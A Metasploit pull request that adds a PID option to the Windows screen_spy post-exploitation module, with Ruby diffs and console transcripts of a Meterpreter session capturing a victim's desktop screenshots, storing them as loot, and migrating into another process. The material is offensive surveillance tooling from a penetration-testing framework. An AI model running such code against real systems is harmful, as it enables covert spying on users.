### PR TITLE
Updating screen_spy.rb to have a PID option for session migration

### DIFF
--- a/documentation/modules/post/windows/gather/screen_spy.md
+++ b/documentation/modules/post/windows/gather/screen_spy.md
@@ -129,5 +129,55 @@ msf6 post(windows/gather/screen_spy) >
 
 ### Windows 10 20H2 (Database Connected, RECORD flag set)
 ```
+msf6 > use post/windows/gather/screen_spy
+msf6 post(windows/gather/screen_spy) > db_status
+[*] Connected to msf. Connection type: postgresql.
+msf6 post(windows/gather/screen_spy) > set SESSION 2
+SESSION => 2
+msf6 post(windows/gather/screen_spy) > show options
 
+Module options (post/windows/gather/screen_spy):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COUNT             6                yes       Number of screenshots to collect
+   DELAY             5                yes       Interval between screenshots in seconds
+   PID                                no        PID to migrate into before taking the screenshots
+   RECORD            true             yes       Record all screenshots to disk by saving them to loot
+   SESSION           2                yes       The session to run this module on.
+   VIEW_SCREENSHOTS  false            no        View screenshots automatically
+
+msf6 post(windows/gather/screen_spy) > run
+
+[*] Capturing 6 screenshots with a delay of 5 seconds
+[*] Screen Spying Complete
+[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
+[*] Post module execution completed
+msf6 post(windows/gather/screen_spy) > loot
+
+Loot
+====
+
+host            service  type                 name              content    info        path
+----            -------  ----                 ----              -------    ----        ----
+172.25.128.214           screenspy.screensho  screenshot.0.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135019_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_098
+                                                                                       612.jpg
+172.25.128.214           screenspy.screensho  screenshot.1.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135024_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_176
+                                                                                       753.jpg
+172.25.128.214           screenspy.screensho  screenshot.2.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135029_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_057
+                                                                                       554.jpg
+172.25.128.214           screenspy.screensho  screenshot.3.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135034_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_187
+                                                                                       603.jpg
+172.25.128.214           screenspy.screensho  screenshot.4.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135039_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_397
+                                                                                       543.jpg
+172.25.128.214           screenspy.screensho  screenshot.5.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135044_d
+                         t                                                             efault_172.25.128.214_screenspy.screen_498
+                                                                                       562.jpg
+
+msf6 post(windows/gather/screen_spy) >
 ```

--- a/documentation/modules/post/windows/gather/screen_spy.md
+++ b/documentation/modules/post/windows/gather/screen_spy.md
@@ -14,14 +14,11 @@ be viewed from the Metasploit interface.
 
   1. Start msfconsole
   2. Get meterpreter session
-  3. Do: ```use post/windows/gather/screen_spy```
-  4. Do: ```set SESSION <session id>```
-  5. Do: ```run```
+  3. Do: `use post/windows/gather/screen_spy`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
 
 ## Options
-
-### SESSION
-The session to run the module on.
 
 ### RECORD
 If set to true, record all screenshots to disk by saving them to loot.

--- a/documentation/modules/post/windows/gather/screen_spy.md
+++ b/documentation/modules/post/windows/gather/screen_spy.md
@@ -20,27 +20,117 @@ be viewed from the Metasploit interface.
 
 ## Options
 
-  **SESSION**
+### SESSION
+The session to run the module on.
 
-  The session to run the module on.
+### RECORD
+If set to true, record all screenshots to disk by saving them to loot.
+
+### PID
+PID to migrate into before taking the screenshots. If no PID is specified, default to current PID.
 
 ## Scenarios
 
-### Windows 7 (6.1 Build 7601, Service Pack 1).
+### Windows 10 20H2 (No Database Connected But RECORD Flag Set)
+```
+msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
+msf6 post(windows/gather/screen_spy) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/screen_spy) > show options
 
-  ```
-  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
+Module options (post/windows/gather/screen_spy):
 
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COUNT             6                yes       Number of screenshots to collect
+   DELAY             5                yes       Interval between screenshots in seconds
+   PID                                no        PID to migrate into before taking the screenshots
+   RECORD            true             yes       Record all screenshots to disk by saving them to loot
+   SESSION           1                yes       The session to run this module on.
+   VIEW_SCREENSHOTS  false            no        View screenshots automatically
 
-  msf > use post/windows/gather/screen_spy
-  msf post(windows/gather/screen_spy) > set SESSION 1
-    SESSION => 1
-  msf post(windows/gather/screen_spy) > run
+msf6 post(windows/gather/screen_spy) > set SESSION 2
+SESSION => 2
+msf6 post(windows/gather/screen_spy) > run
 
-    [*] Migrating to explorer.exe pid: 1908
-    [+] Migration successful
-    [*] Capturing 6 screenshots with a delay of 5 seconds
-    [*] Screen Spying Complete
-    [*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
-    [*] Post module execution completed
-  ```
+[*] Capturing 6 screenshots with a delay of 5 seconds
+[-] RECORD flag specified however the database is not connected, so no loot can be stored!
+[*] Post module execution completed
+```
+
+### Windows 10 20H2 (No Database Connected, RECORD flag not set)
+```
+msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
+msf6 post(windows/gather/screen_spy) > set SESSION 2
+SESSION => 2
+msf6 post(windows/gather/screen_spy) > set RECORD false
+RECORD => false
+msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
+VIEW_SCREENSHOTS => true
+msf6 post(windows/gather/screen_spy) > show options
+
+Module options (post/windows/gather/screen_spy):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COUNT             6                yes       Number of screenshots to collect
+   DELAY             5                yes       Interval between screenshots in seconds
+   PID                                no        PID to migrate into before taking the screenshots
+   RECORD            false            yes       Record all screenshots to disk by saving them to loot
+   SESSION           2                yes       The session to run this module on.
+   VIEW_SCREENSHOTS  true             no        View screenshots automatically
+
+msf6 post(windows/gather/screen_spy) > run
+
+[*] Capturing 6 screenshots with a delay of 5 seconds
+[*] Screen Spying Complete
+[*] Post module execution completed
+msf6 post(windows/gather/screen_spy) >
+```
+
+### Windows 10 20H2 (No Database Connected, RECORD flag not set, PID set to Process to Migrate To)
+```
+msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
+msf6 post(windows/gather/screen_spy) > set SESSION 2
+SESSION => 2
+msf6 post(windows/gather/screen_spy) > set RECORD false
+RECORD => false
+msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
+VIEW_SCREENSHOTS => true
+
+msf6 post(windows/gather/screen_spy) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > ps -aux
+
+Process List
+============
+
+ PID    PPID   Name                   Arch  Session  User                  Path
+ ---    ----   ----                   ----  -------  ----                  ----
+.....
+ 8236   1288   taskhostw.exe
+ 8296   760    svchost.exe
+ 8424   888    RuntimeBroker.exe      x64   2        DESKTOP-KUO5CML\test  C:\Windows\System32\RuntimeBroker.exe
+ 8572   3340   MeSuAx.exe
+ 8636   760    svchost.exe
+ 8664   8036   putty.exe              x64   2        DESKTOP-KUO5CML\test  C:\Program Files\PuTTY\putty.exe
+.....
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 post(windows/gather/screen_spy) > set PID 8664
+PID => 8664
+msf6 post(windows/gather/screen_spy) > run
+
+[+] Migration successful
+[*] Capturing 6 screenshots with a delay of 5 seconds
+[*] Screen Spying Complete
+[*] Post module execution completed
+msf6 post(windows/gather/screen_spy) >
+```
+
+### Windows 10 20H2 (Database Connected, RECORD flag set)
+```
+
+```

--- a/modules/post/windows/gather/screen_spy.rb
+++ b/modules/post/windows/gather/screen_spy.rb
@@ -6,31 +6,34 @@
 require 'rbconfig'
 
 class MetasploitModule < Msf::Post
-  def initialize(info={})
-    super( update_info(info,
-      'Name'           => 'Windows Gather Screen Spy',
-      'Description'    => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Screen Spy',
+        'Description' => %q{
           This module will incrementally take desktop screenshots from the host. This
-        allows for screen spying which can be useful to determine if there is an active
-        user on a machine, or to record the screen for later data extraction.
+          allows for screen spying which can be useful to determine if there is an active
+          user on a machine, or to record the screen for later data extraction.
 
-        Note: As of March, 2014, the VIEW_CMD option has been removed in
-        favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but
-        not how) the collected screenshots will be viewed from the Metasploit
-        interface.
+          Note: As of March, 2014, the VIEW_CMD option has been removed in
+          favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but
+          not how) the collected screenshots will be viewed from the Metasploit
+          interface.
         },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Roni Bachar <roni.bachar.blog[at]gmail.com>', # original meterpreter script
-          'bannedit', # post module
-          'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record/loot support,log x approach, nx
-          'Adrian Kubok', # better record file names
-          'DLL_Cool_J' # Specify PID to migrate into
-        ],
-      'Platform'       => ['win'], # @todo add support for posix meterpreter somehow?
-      'SessionTypes'   => ['meterpreter']
-    ))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Roni Bachar <roni.bachar.blog[at]gmail.com>', # original meterpreter script
+            'bannedit', # post module
+            'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record/loot support,log x approach, nx
+            'Adrian Kubok', # better record file names
+            'DLL_Cool_J' # Specify PID to migrate into
+          ],
+        'Platform' => ['win'], # @todo add support for posix meterpreter somehow?
+        'SessionTypes' => ['meterpreter']
+      )
+    )
 
     register_options(
       [
@@ -39,7 +42,8 @@ class MetasploitModule < Msf::Post
         OptBool.new('VIEW_SCREENSHOTS', [false, 'View screenshots automatically', false]),
         OptBool.new('RECORD', [true, 'Record all screenshots to disk by saving them to loot', true]),
         OptString.new('PID', [false, 'PID to migrate into before taking the screenshots', ''])
-      ])
+      ]
+    )
   end
 
   def view_screenshots?
@@ -52,7 +56,7 @@ class MetasploitModule < Msf::Post
 
   def run
     host = session.session_host
-    screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"
+    screenshot = Msf::Config.get_config_root + '/logs/' + host + '.jpg'
 
     # If no PID is specified, don't migrate.
     if datastore['PID'] != ''
@@ -65,9 +69,9 @@ class MetasploitModule < Msf::Post
     end
 
     begin
-      session.core.use("espia")
+      session.core.use('espia')
     rescue ::Exception => e
-      print_error("Failed to load espia extension (#{e.to_s})")
+      print_error("Failed to load espia extension (#{e})")
       return
     end
 
@@ -75,7 +79,7 @@ class MetasploitModule < Msf::Post
       count = datastore['COUNT']
       print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
       # calculate a sane number of leading zeros to use.  log of x  is ~ the number of digits
-      leading_zeros = Math::log10(count).round
+      leading_zeros = Math.log10(count).round
       file_locations = []
       count.times do |num|
         select(nil, nil, nil, datastore['DELAY'])
@@ -90,7 +94,7 @@ class MetasploitModule < Msf::Post
             if framework.db.active
               # let's loot it using non-clobbering filename, even tho this is the source filename, not dest
               fn = "screenshot.%0#{leading_zeros}d.jpg" % num
-              file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
+              file_locations << store_loot('screenspy.screenshot', 'image/jpg', session, data, fn, 'Screenshot')
             else
               print_error('RECORD flag specified however the database is not connected, so no loot can be stored!')
               return false
@@ -112,15 +116,14 @@ class MetasploitModule < Msf::Post
           screenshot_path = "file://#{screenshot}"
           Rex::Compat.open_browser(screenshot_path)
         end
-
       end
     rescue IOError, Errno::ENOENT => e
       print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
       return
     end
-    print_status("Screen Spying Complete")
-    if record? && framework.db.active && file_locations and not file_locations.empty?
-      print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
+    print_status('Screen Spying Complete')
+    if record? && framework.db.active && file_locations && !file_locations.empty?
+      print_status 'run loot -t screenspy.screenshot to see file locations of your newly acquired loot'
     end
 
     if view_screenshots?
@@ -129,9 +132,9 @@ class MetasploitModule < Msf::Post
       vprint_status "Deleting temporary screenshot file: #{screenshot}"
       begin
         ::File.delete(screenshot)
-      rescue Exception => e
+      rescue StandardError => e
         print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}")
-        print_error("This may be due to the file being in use if you are on a Windows platform")
+        print_error('This may be due to the file being in use if you are on a Windows platform')
       end
     end
 
@@ -140,10 +143,10 @@ class MetasploitModule < Msf::Post
   def migrate
     begin
       session.core.migrate(datastore['PID'].to_i)
-      print_good("Migration successful")
+      print_good('Migration successful')
       return datastore['PID']
-    rescue
-      fail_with(Failure::Unknown, "Migration failed! Unable to take a screenshot under the desired process!")
+    rescue StandardError
+      fail_with(Failure::Unknown, 'Migration failed! Unable to take a screenshot under the desired process!')
       return nil
     end
   end

--- a/modules/post/windows/gather/screen_spy.rb
+++ b/modules/post/windows/gather/screen_spy.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Post
       return
     end
     print_status("Screen Spying Complete")
-    if record? && file_locations and not file_locations.empty?
+    if record? && framework.db.active && file_locations and not file_locations.empty?
       print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
     end
 


### PR DESCRIPTION
## What this Does

Windows post module [screen_spy](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/screen_spy.rb) currently auto migrates into explorer.exe before beginning to take screenshots of the victim's host machine. This PR adds the ability to specify a different process to migrate into as well as specify no process (empty string) in which case screenshots are taken in the context of the current process and no migration occurs. 


## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use post/windows/gather/screen_spy`
- [x] specify ```session``` (```set session 1```)
- [x] (optional) specify process to migrate into (```set PROCESS explorer.exe```)
- [x] ```run```

The image below captures running the post module both with and without a process to migrate into.

![image](https://user-images.githubusercontent.com/1250113/113456002-10445780-93da-11eb-8d09-13a6635dcab9.png)

